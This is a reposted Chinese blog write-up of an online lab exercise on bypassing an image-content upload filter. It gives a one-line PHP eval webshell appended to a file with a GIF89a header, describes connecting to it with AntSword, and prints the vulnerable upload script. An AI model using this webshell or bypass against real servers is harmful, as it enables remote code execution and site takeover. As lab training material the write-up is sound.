php一句话图片马上传绕过
生活随笔
收集整理的這篇文章主要介紹了
php一句话图片马上传绕过
小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.
主頁
burpsuite截獲,修改后綴為php,末尾加上一句話馬(內(nèi)容開頭一定要是圖片文件標(biāo)志頭),上傳成功并返回路徑
<?php @eval($_POST['c']);?>
其他測試:
1、刪掉部分圖片內(nèi)容時(shí)(圖片文件頭不對),無法上傳
2、可以修改圖片文件頭為gif文件的標(biāo)志頭:GIF87a或者GIF89a,都可以成功上傳
3、冰蝎不支持,不知道為什么,是不是不支持圖片馬?
前面的圖片馬可打開瀏覽,但無法連接jpg格式馬
使用蟻劍連接,密碼就是c,測試連接成功
找源代碼文件
順便看看上傳模塊源碼
<?php
//文件上傳漏洞演示腳本之內(nèi)容驗(yàn)證
header("Content-type: text/html; charset=utf-8");
error_reporting(0);
$uploaddir = 'uploads/';
if (isset($_POST['submit'])) {
if (file_exists($uploaddir)) {
//print_r($_FILES);
$file_name = $_FILES['upfile']['tmp_name'];
//print_r(getimagesize($file_name));
$allow_ext = array('image/png', 'image/gif', 'image/jpeg', 'image/bmp');
$img_arr = getimagesize($file_name);
//print_r($img_arr);
$file_ext = $img_arr['mime'];
if (in_array($file_ext, $allow_ext)) {
if (move_uploaded_file($_FILES['upfile']['tmp_name'], $uploaddir . '/' . $_FILES['upfile']['name'])) {
echo '文件上傳成功,保存于:' . $uploaddir . $_FILES['upfile']['name'] . "
";
}
} else {
echo '此文件不允許上傳' . "
";
}
} else {
exit($uploaddir . '文件夾不存在,請手工創(chuàng)建!');
}
//print_r($_FILES);
}
?>
從源碼上分析看,如果上傳文件的mime類型file_ext在allow_ext(
'image/png', 'image/gif', 'image/jpeg', 'image/bmp'
)中,就移動(dòng)上傳文件到/uploads/文件夾下
參考:
WebShell文件上傳漏洞分析溯源(第3題)_文件上傳_在線靶場_墨者學(xué)院_專注于網(wǎng)絡(luò)安全人才培養(yǎng)
奶奶問孫子:4+1等于幾?孫子說:等于6-1。?奶奶說:你明明知道答案,為什么不說??孫子說:年輕人不講5的……..
總結(jié)
以上是生活随笔為你收集整理的php一句话图片马上传绕过的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: docker mysql 命令导入sql
- 下一篇: 怎么查看京东店铺的品牌ID